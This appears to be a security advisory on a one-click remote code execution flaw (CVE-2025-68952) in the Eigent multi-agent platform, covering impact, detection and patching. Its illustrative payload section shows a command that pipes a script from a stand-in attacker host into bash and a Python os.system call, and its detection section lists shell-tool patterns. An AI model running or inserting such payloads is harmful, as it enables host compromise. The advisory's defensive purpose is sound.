A multi-agent automation framework with direct execution paths to the host environment
Vulnerability Overview
| Field | Details |
|---|---|
| CVE ID | CVE-2025-68952 |
| Vulnerability Name | Eigent One-Click Remote Code Execution (RCE) |
| Vendor / Project | Eigent |
| Affected Product | Eigent (Multi-Agent Workforce Platform) |
| Affected Versions | Version 0.0.60 |
| Fixed Version | 0.0.61 |
| Severity | CRITICAL |
| CVSS Score | 9.1 (Critical) |
| CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H |
| CWE Classification | CWE-94: Improper Control of Code Generation |
| Exploitability | Network-based · Low complexity · Requires authenticated user · One-click user interaction |
| Exploit Availability | No public PoC at time of disclosure |
| Patch Status | Patched in version 0.0.61 |
Vulnerability Description
Eigent is a multi-agent workforce platform designed to automate tasks across distributed environments. In version 0.0.60, a one-click Remote Code Execution (RCE) vulnerability was identified that allows arbitrary code execution on the client system or server running Eigent.
The issue is triggered through a single user interaction, such as clicking a crafted task, agent action, or workflow element. Once triggered, attacker-controlled input is executed directly by the underlying runtime without sufficient validation or sandboxing.
This flaw effectively allows a malicious actor to cross the boundary between workflow logic and the host operating system, resulting in full command execution with the privileges of the Eigent process.
Impact
If successfully exploited, this vulnerability could allow an attacker to:
- Execute arbitrary system commands
- Install malware or persistence mechanisms
- Access sensitive files, credentials, or secrets
- Modify or destroy system data
- Pivot to other systems within the same environment
Because the attack requires only one click, it significantly lowers the barrier to exploitation, especially in collaborative or shared workflow environments.
How This Vulnerability Could Be Exploited
A realistic exploitation scenario may look like this:
- An attacker creates or modifies a workflow, agent task, or shared action containing malicious payloads.
- The payload is embedded in a way that appears legitimate (e.g., task description, automation step, agent instruction).
- A victim user clicks or executes the item once.
- The platform processes the payload and executes it directly on the host.
- The attacker gains remote code execution.
Example Payload (Illustrative)
; curl http://attacker.example/payload.sh | bashOr in environments using interpreted execution:
__import__("os").system("id")MITRE ATT&CK Mapping
| Tactic | Technique ID | Technique Name |
|---|---|---|
| Initial Access | T1190 | Exploit Public-Facing Application |
| Execution | T1059 | Command and Scripting Interpreter |
| Privilege Escalation | T1068 | Exploitation for Privilege Escalation |
| Persistence | T1547 | Boot or Logon Autostart Execution |
| Credential Access | T1552 | Unsecured Credentials |
| Lateral Movement | T1021 | Remote Services |
Proof of Concept (PoC) Status
Current Status: No public proof-of-concept code is available.
- The vulnerability has not yet been observed in the wild.
- No exploit code has been published publicly.
- Due to the low complexity and one-click nature, exploitation is considered highly feasible.
- Organizations should assume PoCs may surface quickly.
Detection and Monitoring Guidance
What to Monitor
Security teams should watch for:
- Unexpected command execution initiated by Eigent processes
- Outbound network connections immediately following workflow interactions
- Unusual child processes spawned by Eigent
- Workflow executions that trigger system-level activity
- Sudden file changes or permission modifications on the host
Example Detection Payloads
Suspicious Command Indicators
curl|wget|bash -c|powershell -enc|nc -e|os\.system|subprocessSample Detection Rules
Endpoint Detection (Generic)
IF process_parent = "eig ent"
AND child_process IN ("bash","sh","cmd.exe","powershell")
THEN alert severity = CriticalSIEM / Log-Based Rule
IF workflow_execution
AND system_command_executed = true
AND user_action = single_click
THEN alert severity = HighRelevant Log Sources
To effectively detect exploitation attempts, collect:
- Eigent application logs (workflow execution and agent activity)
- System process logs (process creation, command execution)
- Endpoint Detection & Response (EDR) telemetry
- Authentication logs (user interaction events)
- Network egress logs for unexpected outbound traffic
- File integrity monitoring logs
Remediation and Mitigation
Official Patch (Recommended)
- Upgrade immediately to Eigent version 0.0.61
- This release fixes the unsafe execution path and prevents untrusted input from being executed on the host.
Official Patch / Release Link:
https://github.com/eigent-ai/eigent/releases/tag/v0.0.61
Temporary Mitigations (If Upgrade Is Delayed)
- Restrict workflow creation and execution to trusted users only
- Disable or isolate high-risk automation features
- Run Eigent in a restricted container or sandbox
- Apply strict OS-level permissions to limit process impact
- Monitor closely for abnormal execution behavior
Final Takeaway
CVE-2025-68952 is a critical one-click Remote Code Execution vulnerability in Eigent that allows arbitrary code execution with minimal user interaction. While exploitation requires a click, the impact is severe and can result in full system compromise.
Organizations running Eigent must upgrade to version 0.0.61 immediately. In shared or collaborative environments, this vulnerability represents a serious risk that should be addressed without delay.
